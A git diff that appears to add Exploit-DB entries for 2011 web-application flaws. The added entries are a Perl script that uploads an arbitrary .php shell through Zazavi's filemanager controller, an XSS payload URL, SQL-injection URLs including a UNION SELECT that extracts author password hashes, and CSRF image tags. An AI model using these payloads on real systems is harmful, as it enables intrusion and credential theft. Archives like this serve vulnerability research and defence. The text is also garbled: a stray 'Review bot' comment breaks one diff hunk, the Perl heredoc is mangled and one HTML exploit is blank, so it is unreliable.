diff --git a/files.csv b/files.csv
index ea994db89..8785d7c36 100755
--- a/files.csv
+++ b/files.csv
@@ -32514,3 +32514,10 @@ id,file,description,date,author,platform,type,port
 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
 36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
+36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload Vulnerability",2011-08-25,KedAns-Dz,php,webapps,0
+36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
+36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
+36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
diff --git a/platforms/php/webapps/36079.txt b/platforms/php/webapps/36079.txt
new file mode 100755
index 000000000..3b1126625
--- /dev/null
+++ b/platforms/php/webapps/36079.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49296/info
+
+Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+"/>
\ No newline at end of file
diff --git a/platforms/php/webapps/36080.txt b/platforms/php/webapps/36080.txt
new file mode 100755
index 000000000..a5f1a2f00
--- /dev/null
+++ b/platforms/php/webapps/36080.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49297/info
+
+Hotel Portal is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/36081.txt b/platforms/php/webapps/36081.txt
new file mode 100755
index 000000000..6b23ebb26
--- /dev/null
+++ b/platforms/php/webapps/36081.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49304/info
+
+VicBlog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/vicblog/index.php?page=posts&tag=1%27
\ No newline at end of file
diff --git a/platforms/php/webapps/36082.pl b/platforms/php/webapps/36082.pl
new file mode 100755
index 000000000..f8bc5cbc1
--- /dev/null
+++ b/platforms/php/webapps/36082.pl
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49309/info
+
+Zazavi is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+Zazavi 1.2.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+system ("title KedAns-Dz");
+system ("color 1e");
+system ("cls");
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <> Provided By KedAns-Dz << |
+|= e-mail : ked-h[at]hotmail.com |
+|==========================================|
+INTRO
+print "\n";
+print "[*] Enter URL(f.e: http://target.com): ";
+ chomp(my $url=);
+print "\n";
+print "[*] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
+ chomp(my $file=);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/editor/filemanager/controller.php',
+ Content_Type => 'multipart/form-data',
+ Content =>
+ [
+ action => 'uploadFile',
+ newfile => 'DzOffendersCr3w.php',
+ filepath => $file,
+ ] );
+print "\n";
+if($re->is_success) {
+ if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
+ else { print "[-] File Upload Is Disabled! Failed!\n"; }
+} else { print "[-] HTTP request Failed!\n"; }
+exit;
\ No newline at end of file
diff --git a/platforms/php/webapps/36083.txt b/platforms/php/webapps/36083.txt
new file mode 100755
index 000000000..1954aa396
--- /dev/null
+++ b/platforms/php/webapps/36083.txt
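Review bot: The new 36082.pl entry describes the flaw only in a short blurb and gives defenders nothing to act on; a mitigation and detection comment belongs in the header above the `#!/usr/bin/perl` line. The request built in `$ua->request(POST ...)` targets `/admin/editor/filemanager/controller.php` with `action => 'uploadFile'` and a fixed `newfile` value ending in `.php`, and no cookie or credential is set anywhere in the hunk, so the endpoint presumably accepts uploads without an admin session (not confirmable from this page). I would add `# Mitigation: require an authenticated admin session for filemanager/controller.php and allow-list non-executable upload extensions` and `# Detection: POST to .../filemanager/controller.php with action=uploadFile, followed by a new .php file in the upload directory`. The hunk covers the whole new file.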
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49311/info
+
+Simple Machines Forum is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affected.
+
+[img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]
+
+[img]http://www.example.com/community/index.php?action%00=logout;token[/img]
\ No newline at end of file
diff --git a/platforms/php/webapps/36084.html b/platforms/php/webapps/36084.html
new file mode 100755
index 000000000..25c5b6ff8
--- /dev/null
+++ b/platforms/php/webapps/36084.html
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49315/info
+
+Mambo CMS is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue by tricking an unsuspecting user into visiting a malicious Web page. The page will consist of specially crafted script code designed to perform some action on the attacker's behalf.
+
+Successful exploits will allow attackers to run privileged commands on the affected device.
+
+Mambo CMS 4.6.5 is vulnerable; other versions may also be affected.
+ + + + + + + + +
+ + + + + + + + + + + + +
\ No newline at end of file
diff --git a/platforms/php/webapps/36085.txt b/platforms/php/webapps/36085.txt
new file mode 100755
index 000000000..a7ede3bc5
--- /dev/null
+++ b/platforms/php/webapps/36085.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49354/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors
\ No newline at end of file